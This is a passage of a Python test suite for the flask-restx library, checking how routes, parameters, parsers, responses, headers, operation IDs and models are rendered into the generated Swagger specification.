data = client.get_specs("/api")
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/test/" in paths
assert "get" in paths["/test/"]
op = paths["/test/"]["get"]
assert op["tags"] == ["default"]
assert op["responses"] == {"200": {"description": "Success",}}
assert len(data["tags"]) == 1
tag = data["tags"][0]
assert tag["name"] == "default"
assert tag["description"] == "Default namespace"
assert url_for("api.test") == "/api/test/"
@pytest.mark.api(default="site", default_label="Site namespace")
def test_default_ns_resource_documentation_with_override(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs()
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/test/" in paths
assert "get" in paths["/test/"]
op = paths["/test/"]["get"]
assert op["tags"] == ["site"]
assert op["responses"] == {"200": {"description": "Success",}}
assert len(data["tags"]) == 1
tag = data["tags"][0]
assert tag["name"] == "site"
assert tag["description"] == "Site namespace"
assert url_for("api.test") == "/test/"
@pytest.mark.api(prefix="/api")
def test_ns_resource_documentation(self, api, client):
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("/api")
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/ns/" in paths
assert "get" in paths["/ns/"]
op = paths["/ns/"]["get"]
assert op["tags"] == ["ns"]
assert op["responses"] == {"200": {"description": "Success",}}
assert "parameters" not in op
assert len(data["tags"]) == 1
tag = data["tags"][-1]
assert tag["name"] == "ns"
assert tag["description"] == "Test namespace"
assert url_for("api.test") == "/api/ns/"
def test_ns_resource_documentation_lazy(self, app, client):
api = restx.Api()
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
api.init_app(app)
data = client.get_specs()
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/ns/" in paths
assert "get" in paths["/ns/"]
op = paths["/ns/"]["get"]
assert op["tags"] == ["ns"]
assert op["responses"] == {"200": {"description": "Success",}}
assert len(data["tags"]) == 1
tag = data["tags"][-1]
assert tag["name"] == "ns"
assert tag["description"] == "Test namespace"
assert url_for("test") == "/ns/"
def test_methods_docstring_to_summary(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
def post(self):
"""POST operation.
Should be ignored
"""
return {}
def put(self):
"""PUT operation. Should be ignored"""
return {}
def delete(self):
"""
DELETE operation.
Should be ignored.
"""
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert len(path.keys()) == 4
for method in path.keys():
operation = path[method]
assert method in ("get", "post", "put", "delete")
assert operation["summary"] == "{0} operation".format(method.upper())
assert operation["operationId"] == "{0}_test_resource".format(
method.lower()
)
# assert operation['parameters'] == []
def test_path_parameter_no_type(self, api, client):
@api.route("/id/<id>/", endpoint="by-id")
class ByIdResource(restx.Resource):
def get(self, id):
return {}
data = client.get_specs()
assert "/id/{id}/" in data["paths"]
path = data["paths"]["/id/{id}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "id"
assert parameter["type"] == "string"
assert parameter["in"] == "path"
assert parameter["required"] is True
def test_path_parameter_with_type(self, api, client):
@api.route("/name/<int:age>/", endpoint="by-name")
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
def test_path_parameter_with_type_with_argument(self, api, client):
@api.route("/name/<string(length=2):id>/", endpoint="by-name")
class ByNameResource(restx.Resource):
def get(self, id):
return {}
data = client.get_specs()
assert "/name/{id}/" in data["paths"]
path = data["paths"]["/name/{id}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "id"
assert parameter["type"] == "string"
assert parameter["in"] == "path"
assert parameter["required"] is True
def test_path_parameter_with_explicit_details(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={"params": {"age": {"description": "An age"}}},
)
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
def test_path_parameter_with_decorator_details(self, api, client):
@api.route("/name/<int:age>/")
@api.param("age", "An age")
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
def test_expect_parser(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
parser.add_argument("jsonparam", type=str, location="json", help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 2
parameter = [o for o in op["parameters"] if o["in"] == "query"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
parameter = [o for o in op["parameters"] if o["in"] == "body"][0]
assert parameter["name"] == "payload"
assert parameter["required"]
assert parameter["in"] == "body"
assert parameter["schema"]["properties"]["jsonparam"]["type"] == "string"
def test_expect_parser_on_class(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
@api.expect(parser)
class WithParserResource(restx.Resource):
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
path = data["paths"]["/with-parser/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
def test_method_parser_on_class(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
@api.doc(get={"expect": parser})
class WithParserResource(restx.Resource):
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
op = data["paths"]["/with-parser/"]["post"]
assert "parameters" not in op
def test_parser_parameters_override(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
@api.doc(params={"param": {"description": "New description"}})
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "New description"
def test_parser_parameter_in_form(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param", location="form")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "formData"
assert parameter["description"] == "Some param"
assert op["consumes"] == [
"application/x-www-form-urlencoded",
"multipart/form-data",
]
def test_parser_parameter_in_files(self, api, client):
parser = api.parser()
parser.add_argument("in_files", type=FileStorage, location="files")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "in_files"
assert parameter["type"] == "file"
assert parameter["in"] == "formData"
assert op["consumes"] == ["multipart/form-data"]
def test_parser_parameter_in_files_on_class(self, api, client):
parser = api.parser()
parser.add_argument("in_files", type=FileStorage, location="files")
@api.route("/with-parser/", endpoint="with-parser")
@api.expect(parser)
class WithParserResource(restx.Resource):
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
path = data["paths"]["/with-parser/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "in_files"
assert parameter["type"] == "file"
assert parameter["in"] == "formData"
assert "consumes" not in path
op = path["get"]
assert "consumes" in op
assert op["consumes"] == ["multipart/form-data"]
def test_explicit_parameters(self, api, client):
@api.route("/name/<int:age>/", endpoint="by-name")
class ByNameResource(restx.Resource):
@api.doc(
params={
"q": {
"type": "string",
"in": "query",
"description": "A query string",
}
}
)
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
op = path["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
def test_explicit_parameters_with_decorator(self, api, client):
@api.route("/name/")
class ByNameResource(restx.Resource):
@api.param("q", "A query string", type="string", _in="formData")
def get(self, age):
return {}
data = client.get_specs()
assert "/name/" in data["paths"]
op = data["paths"]["/name/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "formData"
assert parameter["description"] == "A query string"
def test_class_explicit_parameters(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"params": {
"q": {
"type": "string",
"in": "query",
"description": "A query string",
}
}
},
)
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 2
by_name = dict((p["name"], p) for p in path["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
parameter = by_name["q"]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
def test_explicit_parameters_override(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"params": {
"q": {
"type": "string",
"in": "query",
"description": "Overriden description",
},
"age": {"description": "An age"},
}
},
)
class ByNameResource(restx.Resource):
@api.doc(params={"q": {"description": "A query string"}})
def get(self, age):
return {}
def post(self, age):
pass
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
by_name = dict((p["name"], p) for p in path["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
# Don't duplicate parameters
assert "q" not in by_name
get = data["paths"]["/name/{age}/"]["get"]
assert len(get["parameters"]) == 1
parameter = get["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
post = data["paths"]["/name/{age}/"]["post"]
assert len(post["parameters"]) == 1
parameter = post["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "Overriden description"
def test_explicit_parameters_override_by_method(self, api, client):
    """Per-HTTP-method keys in the route ``doc`` attach params to that method only.

    With a method-specific "get" entry present, nothing stays at path level;
    "q" appears only on GET and the method-level ``@api.doc`` overrides the
    route-level "age" description on GET but not on POST.
    """
    @api.route(
        "/name/<int:age>/",
        endpoint="by-name",
        doc={
            "get": {
                "params": {
                    "q": {
                        "type": "string",
                        "in": "query",
                        "description": "A query string",
                    }
                }
            },
            "params": {"age": {"description": "An age"}},
        },
    )
    class ByNameResource(restx.Resource):
        @api.doc(params={"age": {"description": "Overriden"}})
        def get(self, age):
            return {}

        def post(self, age):
            return {}

    data = client.get_specs()

    assert "/name/{age}/" in data["paths"]
    path = data["paths"]["/name/{age}/"]
    # Everything is method-specific here, so no path-level parameters.
    assert "parameters" not in path

    get = path["get"]
    assert len(get["parameters"]) == 2
    by_name = dict((p["name"], p) for p in get["parameters"])
    parameter = by_name["age"]
    assert parameter["name"] == "age"
    assert parameter["type"] == "integer"
    assert parameter["in"] == "path"
    assert parameter["required"] is True
    assert parameter["description"] == "Overriden"
    parameter = by_name["q"]
    assert parameter["name"] == "q"
    assert parameter["type"] == "string"
    assert parameter["in"] == "query"
    assert parameter["description"] == "A query string"

    post = path["post"]
    assert len(post["parameters"]) == 1
    by_name = dict((p["name"], p) for p in post["parameters"])
    parameter = by_name["age"]
    assert parameter["name"] == "age"
    assert parameter["type"] == "integer"
    assert parameter["in"] == "path"
    assert parameter["required"] is True
    # POST keeps the route-level description.
    assert parameter["description"] == "An age"
def test_parameters_cascading_with_apidoc_false(self, api, client):
    """A method decorated with ``@api.doc(False)`` is excluded from the spec.

    Parameter cascading still works for the documented GET, while the hidden
    POST produces no operation entry at all.
    """
    @api.route(
        "/name/<int:age>/",
        endpoint="by-name",
        doc={
            "get": {
                "params": {
                    "q": {
                        "type": "string",
                        "in": "query",
                        "description": "A query string",
                    }
                }
            },
            "params": {"age": {"description": "An age"}},
        },
    )
    class ByNameResource(restx.Resource):
        @api.doc(params={"age": {"description": "Overriden"}})
        def get(self, age):
            return {}

        # doc(False) hides this method from the generated documentation.
        @api.doc(False)
        def post(self, age):
            return {}

    data = client.get_specs()

    assert "/name/{age}/" in data["paths"]
    path = data["paths"]["/name/{age}/"]
    assert "parameters" not in path

    get = path["get"]
    assert len(get["parameters"]) == 2
    by_name = dict((p["name"], p) for p in get["parameters"])
    assert "age" in by_name
    assert "q" in by_name

    assert "post" not in path
def test_explicit_parameters_description_shortcut(self, api, client):
    """A plain string in ``params`` is a shortcut for ``{"description": ...}``.

    The shortcut works at route level, per-method level and in ``@api.doc``;
    override rules are the same as for the full dict form.
    """
    # NOTE(review): renamed from test_explicit_parameters_desription_shortcut
    # to fix the "desription" typo; pytest discovers either name.
    @api.route(
        "/name/<int:age>/",
        endpoint="by-name",
        doc={
            "get": {"params": {"q": "A query string",}},
            "params": {"age": "An age"},
        },
    )
    class ByNameResource(restx.Resource):
        @api.doc(params={"age": "Overriden"})
        def get(self, age):
            return {}

        def post(self, age):
            return {}

    data = client.get_specs()

    assert "/name/{age}/" in data["paths"]
    path = data["paths"]["/name/{age}/"]
    assert "parameters" not in path

    get = path["get"]
    assert len(get["parameters"]) == 2
    by_name = dict((p["name"], p) for p in get["parameters"])
    parameter = by_name["age"]
    assert parameter["name"] == "age"
    assert parameter["type"] == "integer"
    assert parameter["in"] == "path"
    assert parameter["required"] is True
    assert parameter["description"] == "Overriden"
    parameter = by_name["q"]
    assert parameter["name"] == "q"
    assert parameter["type"] == "string"
    assert parameter["in"] == "query"
    assert parameter["description"] == "A query string"

    post = path["post"]
    assert len(post["parameters"]) == 1
    by_name = dict((p["name"], p) for p in post["parameters"])
    parameter = by_name["age"]
    assert parameter["name"] == "age"
    assert parameter["type"] == "integer"
    assert parameter["in"] == "path"
    assert parameter["required"] is True
    assert parameter["description"] == "An age"
    # "q" was declared for GET only, so it must not leak onto POST.
    assert "q" not in by_name
def test_explicit_parameters_native_types(self, api, client):
    """Native Python types given as ``type`` are mapped to Swagger types.

    ``int``/``float``/``bool``/``str`` map to integer/number/boolean/string,
    and a one-element list (e.g. ``[int]``) maps to an array of that type.
    """
    @api.route("/types/", endpoint="native")
    class NativeTypesResource(restx.Resource):
        @api.doc(
            params={
                "int": {"type": int, "in": "query",},
                "float": {"type": float, "in": "query",},
                "bool": {"type": bool, "in": "query",},
                "str": {"type": str, "in": "query",},
                "int-array": {"type": [int], "in": "query",},
                "float-array": {"type": [float], "in": "query",},
                "bool-array": {"type": [bool], "in": "query",},
                "str-array": {"type": [str], "in": "query",},
            }
        )
        # Fixed: the route has no URL converter, so get() must not take an
        # extra positional argument (a real GET would raise a TypeError).
        def get(self):
            return {}

    data = client.get_specs()
    op = data["paths"]["/types/"]["get"]
    parameters = dict((p["name"], p) for p in op["parameters"])

    assert parameters["int"]["type"] == "integer"
    assert parameters["float"]["type"] == "number"
    assert parameters["str"]["type"] == "string"
    assert parameters["bool"]["type"] == "boolean"
    assert parameters["int-array"]["type"] == "array"
    assert parameters["int-array"]["items"]["type"] == "integer"
    assert parameters["float-array"]["type"] == "array"
    assert parameters["float-array"]["items"]["type"] == "number"
    assert parameters["str-array"]["type"] == "array"
    assert parameters["str-array"]["items"]["type"] == "string"
    assert parameters["bool-array"]["type"] == "array"
    assert parameters["bool-array"]["items"]["type"] == "boolean"
def test_response_on_method(self, api, client):
    """``@api.doc(responses=...)`` renders codes, messages and model $refs.

    A ``(message, model-name)`` tuple attaches a schema reference and the
    referenced model is registered under "definitions".
    """
    api.model("ErrorModel", {"message": restx.fields.String,})

    @api.route("/test/")
    class ByNameResource(restx.Resource):
        @api.doc(
            responses={404: "Not found", 405: ("Some message", "ErrorModel"),}
        )
        def get(self):
            return {}

    data = client.get_specs("")
    paths = data["paths"]
    assert len(paths.keys()) == 1

    op = paths["/test/"]["get"]
    assert op["tags"] == ["default"]
    assert op["responses"] == {
        "404": {"description": "Not found",},
        "405": {
            "description": "Some message",
            "schema": {"$ref": "#/definitions/ErrorModel",},
        },
    }

    assert "definitions" in data
    assert "ErrorModel" in data["definitions"]
def test_api_response(self, api, client):
    """A single ``@api.response`` produces one response entry with a string code."""
    @api.route("/test/")
    class TestResource(restx.Resource):
        @api.response(200, "Success")
        def get(self):
            pass

    data = client.get_specs("")
    paths = data["paths"]

    op = paths["/test/"]["get"]
    assert op["responses"] == {"200": {"description": "Success",}}
def test_api_response_multiple(self, api, client):
    """Stacked ``@api.response`` decorators each contribute a response entry."""
    @api.route("/test/")
    class TestResource(restx.Resource):
        @api.response(200, "Success")
        @api.response(400, "Validation error")
        def get(self):
            pass

    data = client.get_specs("")
    paths = data["paths"]

    op = paths["/test/"]["get"]
    assert op["responses"] == {
        "200": {"description": "Success",},
        "400": {"description": "Validation error",},
    }
def test_api_response_with_model(self, api, client):
    """``@api.response`` with a model attaches a $ref and registers the model."""
    model = api.model("SomeModel", {"message": restx.fields.String,})

    @api.route("/test/")
    class TestResource(restx.Resource):
        @api.response(200, "Success", model)
        def get(self):
            pass

    data = client.get_specs("")
    paths = data["paths"]

    op = paths["/test/"]["get"]
    assert op["responses"] == {
        "200": {
            "description": "Success",
            "schema": {"$ref": "#/definitions/SomeModel",},
        }
    }

    assert "SomeModel" in data["definitions"]
def test_api_response_default(self, api, client):
    """The special "default" response code is passed through untouched."""
    @api.route("/test/")
    class TestResource(restx.Resource):
        @api.response("default", "Error")
        def get(self):
            pass

    data = client.get_specs("")
    paths = data["paths"]

    op = paths["/test/"]["get"]
    assert op["responses"] == {"default": {"description": "Error",}}
def test_api_header(self, api, client):
    """``@api.header`` (class- and method-level) documents response headers.

    Checks the default string type, array types with ``collectionFormat``,
    native ``int`` mapping and an explicit Swagger type string.
    """
    @api.route("/test/")
    @api.header("X-HEADER", "A class header")
    class TestResource(restx.Resource):
        @api.header(
            "X-HEADER-2", "Another header", type=[int], collectionFormat="csv"
        )
        @api.header("X-HEADER-3", type=int)
        @api.header("X-HEADER-4", type="boolean")
        def get(self):
            pass

    data = client.get_specs("")
    headers = data["paths"]["/test/"]["get"]["responses"]["200"]["headers"]

    assert "X-HEADER" in headers
    assert headers["X-HEADER"] == {
        "type": "string",
        "description": "A class header",
    }

    assert "X-HEADER-2" in headers
    assert headers["X-HEADER-2"] == {
        "type": "array",
        "items": {"type": "integer"},
        "description": "Another header",
        "collectionFormat": "csv",
    }

    assert "X-HEADER-3" in headers
    assert headers["X-HEADER-3"] == {"type": "integer"}

    assert "X-HEADER-4" in headers
    assert headers["X-HEADER-4"] == {"type": "boolean"}
def test_response_header(self, api, client):
    """``headers=`` on ``@api.response`` documents headers for that code only."""
    @api.route("/test/")
    class TestResource(restx.Resource):
        @api.response(200, "Success")
        @api.response(400, "Validation", headers={"X-HEADER": "An header"})
        def get(self):
            pass

    data = client.get_specs("")
    headers = data["paths"]["/test/"]["get"]["responses"]["400"]["headers"]

    assert "X-HEADER" in headers
    assert headers["X-HEADER"] == {
        "type": "string",
        "description": "An header",
    }
def test_api_and_response_header(self, api, client):
    """``@api.header`` headers apply to every response; per-response headers don't.

    X-HEADER/X-HEADER-2 show up on both 200 and 400, whereas X-ERROR stays on
    the 400 response it was declared with.
    """
    @api.route("/test/")
    @api.header("X-HEADER", "A class header")
    class TestResource(restx.Resource):
        @api.header("X-HEADER-2", type=int)
        @api.response(200, "Success")
        @api.response(400, "Validation", headers={"X-ERROR": "An error header"})
        def get(self):
            pass

    data = client.get_specs("")
    headers200 = data["paths"]["/test/"]["get"]["responses"]["200"]["headers"]
    headers400 = data["paths"]["/test/"]["get"]["responses"]["400"]["headers"]

    for headers in (headers200, headers400):
        assert "X-HEADER" in headers
        assert "X-HEADER-2" in headers

    assert "X-ERROR" in headers400
    assert "X-ERROR" not in headers200
def test_expect_header(self, api, client):
    """RequestParser header arguments via ``@api.expect`` become header parameters.

    Covers required flag, ``action="split"`` → array with csv collectionFormat,
    native ``int`` and the ``inputs.boolean`` converter.
    """
    parser = api.parser()
    parser.add_argument(
        "X-Header", location="headers", required=True, help="A required header"
    )
    parser.add_argument(
        "X-Header-2",
        location="headers",
        type=int,
        action="split",
        help="Another header",
    )
    parser.add_argument("X-Header-3", location="headers", type=int)
    parser.add_argument("X-Header-4", location="headers", type=inputs.boolean)

    @api.route("/test/")
    class TestResource(restx.Resource):
        @api.expect(parser)
        def get(self):
            pass

    data = client.get_specs("")
    parameters = data["paths"]["/test/"]["get"]["parameters"]

    # Parameter order is not guaranteed, so look each one up by name.
    def get_param(name):
        candidates = [p for p in parameters if p["name"] == name]
        assert len(candidates) == 1, "parameter {0} not found".format(name)
        return candidates[0]

    parameter = get_param("X-Header")
    assert parameter["type"] == "string"
    assert parameter["in"] == "header"
    assert parameter["required"] is True
    assert parameter["description"] == "A required header"

    parameter = get_param("X-Header-2")
    assert parameter["type"] == "array"
    assert parameter["in"] == "header"
    assert parameter["items"]["type"] == "integer"
    assert parameter["description"] == "Another header"
    assert parameter["collectionFormat"] == "csv"

    parameter = get_param("X-Header-3")
    assert parameter["type"] == "integer"
    assert parameter["in"] == "header"

    parameter = get_param("X-Header-4")
    assert parameter["type"] == "boolean"
    assert parameter["in"] == "header"
def test_description(self, api, client):
    """Operation descriptions combine the route-level parent description with
    method-level sources: ``@api.doc(description=...)``, the docstring body
    (text after the summary line), or a per-method route ``doc`` entry.

    A docstring that is only a summary contributes no description, and an
    undocumented resource gets no "description" key at all.
    """
    @api.route(
        "/description/",
        endpoint="description",
        doc={
            "description": "Parent description.",
            "delete": {"description": "A delete operation"},
        },
    )
    class ResourceWithDescription(restx.Resource):
        @api.doc(description="Some details")
        def get(self):
            return {}

        def post(self):
            """
            Do something.

            Extra description
            """
            return {}

        def put(self):
            """No description (only summary)"""

        def delete(self):
            """No description (only summary)"""

    @api.route("/descriptionless/", endpoint="descriptionless")
    class ResourceWithoutDescription(restx.Resource):
        def get(self):
            """No description (only summary)"""
            return {}

    data = client.get_specs()

    description = lambda m: data["paths"]["/description/"][m]["description"]  # noqa
    assert description("get") == dedent(
        """\
        Parent description.
        Some details"""
    )
    assert description("post") == dedent(
        """\
        Parent description.
        Extra description"""
    )
    assert description("delete") == dedent(
        """\
        Parent description.
        A delete operation"""
    )
    assert description("put") == "Parent description."

    assert "description" not in data["paths"]["/descriptionless/"]["get"]
def test_operation_id(self, api, client):
    """``@api.doc(id=...)`` sets operationId; otherwise a default is derived
    from the method and resource name (snake_case)."""
    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        @api.doc(id="get_objects")
        def get(self):
            return {}

        def post(self):
            return {}

    data = client.get_specs()
    path = data["paths"]["/test/"]

    assert path["get"]["operationId"] == "get_objects"
    assert path["post"]["operationId"] == "post_test_resource"
def test_operation_id_shortcut(self, api, client):
    """A bare string passed to ``@api.doc`` is a shortcut for ``id=``."""
    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        @api.doc("get_objects")
        def get(self):
            return {}

    data = client.get_specs()
    path = data["paths"]["/test/"]

    assert path["get"]["operationId"] == "get_objects"
def test_custom_default_operation_id(self, app, client):
    """``Api(default_id=...)`` customises how default operationIds are built;
    an explicit ``@api.doc(id=...)`` still takes precedence."""
    def default_id(resource, method):
        return "{0}{1}".format(method, resource)

    api = restx.Api(app, default_id=default_id)

    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        @api.doc(id="get_objects")
        def get(self):
            return {}

        def post(self):
            return {}

    data = client.get_specs()
    path = data["paths"]["/test/"]

    assert path["get"]["operationId"] == "get_objects"
    assert path["post"]["operationId"] == "postTestResource"
# The api fixture is configured through the marker, exercising default_id on a
# blueprint-mounted Api.
@pytest.mark.api(default_id=lambda r, m: "{0}{1}".format(m, r))
def test_custom_default_operation_id_blueprint(self, api, client):
    """Same as test_custom_default_operation_id but with the fixture-provided
    (blueprint) Api carrying the custom ``default_id``."""
    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        @api.doc(id="get_objects")
        def get(self):
            return {}

        def post(self):
            return {}

    data = client.get_specs()
    path = data["paths"]["/test/"]

    assert path["get"]["operationId"] == "get_objects"
    assert path["post"]["operationId"] == "postTestResource"
def test_model_primitive_types(self, api, client):
    """``model=int`` renders an inline primitive schema and registers nothing
    under "definitions"."""
    @api.route("/model-int/")
    class ModelInt(restx.Resource):
        @api.doc(model=int)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" not in data
    assert data["paths"]["/model-int/"]["get"]["responses"] == {
        "200": {"description": "Success", "schema": {"type": "integer"}}
    }
def test_model_as_flat_dict(self, api, client):
    """A registered model can be referenced by object or by name in ``@api.doc``;
    both render as the same $ref."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=fields)
        def get(self):
            return {}

        # Referencing the registered model by its name string.
        @api.doc(model="Person")
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    path = data["paths"]["/model-as-dict/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
    )
    assert (
        path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
    )
def test_model_as_nested_dict(self, api, client):
    """``fields.Nested`` renders a $ref property and registers both models."""
    address_fields = api.model("Address", {"road": restx.fields.String,})
    fields = api.model("Person", {"address": restx.fields.Nested(address_fields)})

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=fields)
        def get(self):
            return {}

        @api.doc(model="Person")
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {"address": {"$ref": "#/definitions/Address"},},
        "type": "object",
    }
    assert "Address" in data["definitions"]
    assert data["definitions"]["Address"] == {
        "properties": {"road": {"type": "string"},},
        "type": "object",
    }

    path = data["paths"]["/model-as-dict/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
    )
    assert (
        path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
    )
def test_model_as_nested_dict_with_details(self, api, client):
    """A Nested field with extra attributes (description, readonly) wraps the
    $ref in ``allOf`` so the sibling keywords remain valid JSON Schema."""
    address_fields = api.model("Address", {"road": restx.fields.String,})
    fields = api.model(
        "Person",
        {
            "address": restx.fields.Nested(
                address_fields, description="description", readonly=True
            )
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=fields)
        def get(self):
            return {}

        @api.doc(model="Person")
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {
            "address": {
                "description": "description",
                "readOnly": True,
                "allOf": [{"$ref": "#/definitions/Address"}],
            },
        },
        "type": "object",
    }
    assert "Address" in data["definitions"]
    assert data["definitions"]["Address"] == {
        "properties": {"road": {"type": "string"},},
        "type": "object",
    }
def test_model_as_flat_dict_with_marshal_decorator(self, api, client):
    """``@api.marshal_with`` documents a 200 response referencing the model."""
    # NOTE(review): renamed from ..._marchal_decorator to fix the typo.
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(fields)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    responses = data["paths"]["/model-as-dict/"]["get"]["responses"]
    assert responses == {
        "200": {
            "description": "Success",
            "schema": {"$ref": "#/definitions/Person"},
        }
    }
